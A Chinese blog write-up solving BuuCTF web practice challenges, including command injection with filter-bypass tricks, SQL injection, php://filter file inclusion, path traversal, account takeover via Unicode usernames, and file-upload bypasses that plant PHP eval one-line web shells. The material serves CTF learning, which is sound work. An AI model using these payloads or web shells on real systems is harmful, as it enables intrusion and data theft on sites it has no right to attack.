BuuCTF_web

目录

[HCTF 2018]admin

[极客大挑战 2019]BuyFlag

 [ACTF2020 新生赛]Exec

[GXYCTF2019]Ping Ping Ping

[ACTF2020 新生赛]Include

[极客大挑战 2019]EasySQL

[极客大挑战 2019]Havefun

[HCTF 2018]WarmUp

[极客大挑战 2019]Secret File

[极客大挑战 2019]Upload 

[ACTF2020 新生赛]Upload


[HCTF 2018]admin

启动靶机

进入登录页面,题目的提示是admin,所以可能是使用admin登录上去

解法一:

我们发现使用弱口令,Username:admin,Password:123(弱口令),登录上去,获得flag

解法二:

我们发现还有注册页面,但是无法注册账号为admin、ADMIN......

https://www.anquanke.com/post/id/164086#h3-7

由大佬的文章可得:可以使用ᴬᴰᴹᴵᴺ注册,密码为123,

注册成功后,登录进去,然后进行改密码,改为456

然后退出来,使用admin,456登录,获得flag

查找还有两种方案,但是我不会

[极客大挑战 2019]BuyFlag

打开靶机,查看源码发现

发现user的值为0,改为1,然后刷新页面 

发现这里发生了变化,使用Max HacKBar

我们发现这里的Nember lenth is too long,所以使用money[]=1&password=404mochu,然后得到flag。

参考文献:

https://blog.csdn.net/mochu7777777/article/details/109501224

 [ACTF2020 新生赛]Exec

输入127.0.0.1

 127.0.0.1 & ls;

127.0.0.1 & cat index.php

 我们直接读取flag    127.0.0.1 & cat /flag

[GXYCTF2019]Ping Ping Ping

 

ls查询发现flag.php,cat flag.php发现不行,应该是过滤了

${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS
< 
<> 
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20   (space)
%09   (tab)
X=$'cat\x09./flag.php';$X 

tip:有时会禁用cat:
解决方法是使用tac反向输出命令:
linux命令中可以加\,所以甚至可以ca\t /fl\ag

空格用$IFS$绕过后发现

?ip=127.0.0.1;a=f;cat$IFS$1$alag.php    过滤
?ip=127.0.0.1;a=l;cat$IFS$1f$aag.php	没flag
?ip=127.0.0.1;a=a;cat$IFS$1fl$ag.php  	过滤
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php	有flag
?ip=127.0.0.1;a=fl;b=ag;cat$IFS$1$a$b.php 过滤
?ip=127.0.0.1;b=ag;a=fl;cat$IFS$1$a$b.php 有flag

可能是过滤了flag,我们用/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php绕过,绕过后查看源码,发现flag

[ACTF2020 新生赛]Include

 ?file=php://filter/read=convert.base64-encode/resource=flag.php

 

得到的进行base64解密,得到

 

参考:

https://blog.csdn.net/TM_1024/article/details/106966460

[极客大挑战 2019]EasySQL

使用万能密码1' or '1' = '1

得到flag

[极客大挑战 2019]Havefun

打开源码,有发现

cat=dog,得到flag

[HCTF 2018]WarmUp

查看源码发现source.php,打开发现

访问hint.php

没有flag,再回来分析源码

没有flag,那我们继续 source.php?file=source.php?../../../../../ffffllllaaaagggg得到flag 

[极客大挑战 2019]Secret File

进入查看源代码,发现Archive_room.php

进入Archive_room.php,

发现什么都没有,进行查看,发现没有什么,试一下抓包,有了发现,发现了这个secr3t.php

 我们发现这里有php,一看就是文件包含,接下来进行代码审计(难受)

这里使用文件包含伪协议https://blog.csdn.net/Wu000999/article/details/101925271

 所以使用:file=php://filter/read=convert.base64-encode/resource=./flag.php

这里出现base64,进行解密,得到 

 

flag就在其中

[极客大挑战 2019]Upload 

发现过滤了<,上传jpg图片也不成功

进行抓包,发现文件后缀必须为image/jpeg 

一句话木马

<?php @eval($_POST['attack']);?>
GIF89a?
<script language="php">eval($_REQUEST[shell])</script>

 绕过<,php利用phtml绕过

  

上传成功,我们现在使用蚁剑连接

然后找到flag

[ACTF2020 新生赛]Upload

上传jpg文件,改为php上传失败,然后改为phtml发现上传成功,用蚁剑连接

 

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值